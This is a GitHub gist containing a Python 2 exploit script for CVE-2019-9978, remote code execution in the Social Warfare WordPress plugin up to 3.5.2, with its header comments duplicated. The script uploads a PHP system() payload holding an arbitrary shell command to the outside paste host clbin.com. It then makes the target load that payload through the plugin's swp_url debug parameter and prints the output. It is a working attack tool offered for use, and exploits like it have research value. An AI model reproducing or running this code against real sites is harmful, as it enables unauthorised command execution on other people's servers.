Created
May 12, 2019 07:21
-
-
Save budanthara/add0636a478d00ebc95fb7a5b4fe35b0 to your computer and use it in GitHub Desktop.
Revisions
-
budanthara created this gist
May 12, 2019 .There are no files selected for viewing
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters. Learn more about bidirectional Unicode charactersOriginal file line number Diff line number Diff line change @@ -0,0 +1,74 @@ # Title: RCE in Social Warfare Plugin Wordpress ( <=3D3.5.2 ) # Date: March, 2019 # Researcher: Luka Sikic # Exploit Author: hash3liZer # Download Link: https://wordpress.org/plugins/social-warfare/ # Reference: https://wpvulndb.com/vulnerabilities/9259?fbclid=3DIwAR2xLSnan=ccqwZNqc2c7cIv447Lt80mHivtyNV5ZXGS0ZaScxIYcm1XxWXM # Github: https://github.com/hash3liZer/CVE-2019-9978 # Version: <=3D 3.5.2 # CVE: CVE-2019-9978 # Title: RCE in Social Warfare Plugin Wordpress ( <=3.5.2 ) # Date: March, 2019 # Researcher: Luka Sikic # Exploit Author: hash3liZer # Download Link: https://wordpress.org/plugins/social-warfare/ # Reference: https://wpvulndb.com/vulnerabilities/9259?fbclid=IwAR2xLSnanccqwZNqc2c7cIv447Lt80mHivtyNV5ZXGS0ZaScxIYcm1XxWXM # Github: https://github.com/hash3liZer/CVE-2019-9978 # Version: <= 3.5.2 # CVE: CVE-2019-9978 # Modified by: snoww0lf import sys import requests import re import urlparse import optparse class EXPLOIT: VULNPATH = "wp-admin/admin-post.php?swp_debug=load_options&swp_url=%s" def __init__(self, _t, _c): self.target = _t self.command = _c def payload_url(self): url = "https://clbin.com/" data = {'clbin': "<pre>system('" + self.command + "')</pre>"} r = requests.post(url, data=data) return r.text.strip() def engage(self): uri = urlparse.urljoin( self.target, self.VULNPATH % self.payload_url() ) r = requests.get( uri ) if r.status_code == 200: print "[*] Received Response From Server!" rr = r.text obj = re.search(r"^(.*)<\!DOCTYPE", r.text.replace( "\n", "lnbreak" )) if obj: resp = obj.groups()[0] if resp: print "[<] Received: " print resp.replace( "lnbreak", "\n" ) else: sys.exit("[<] Nothing Received for the given payload. Seems like the server is not vulnerable!") else: sys.exit("[<] Nothing Received for the given payload. Seems like the server is not vulnerable!") else: sys.exit( "[~] Unexpected Status Received!" ) def main(): parser = optparse.OptionParser( ) parser.add_option( '-t', '--target', dest="target", default="", type="string", help="Target Link" ) parser.add_option( '-c' , '--command', dest="command", default="", type="string", help="Enter linux command" ) (options, args) = parser.parse_args() print "[>] Sending Payload to System!" exploit = EXPLOIT( options.target, options.command ) exploit.engage() if __name__ == "__main__": main()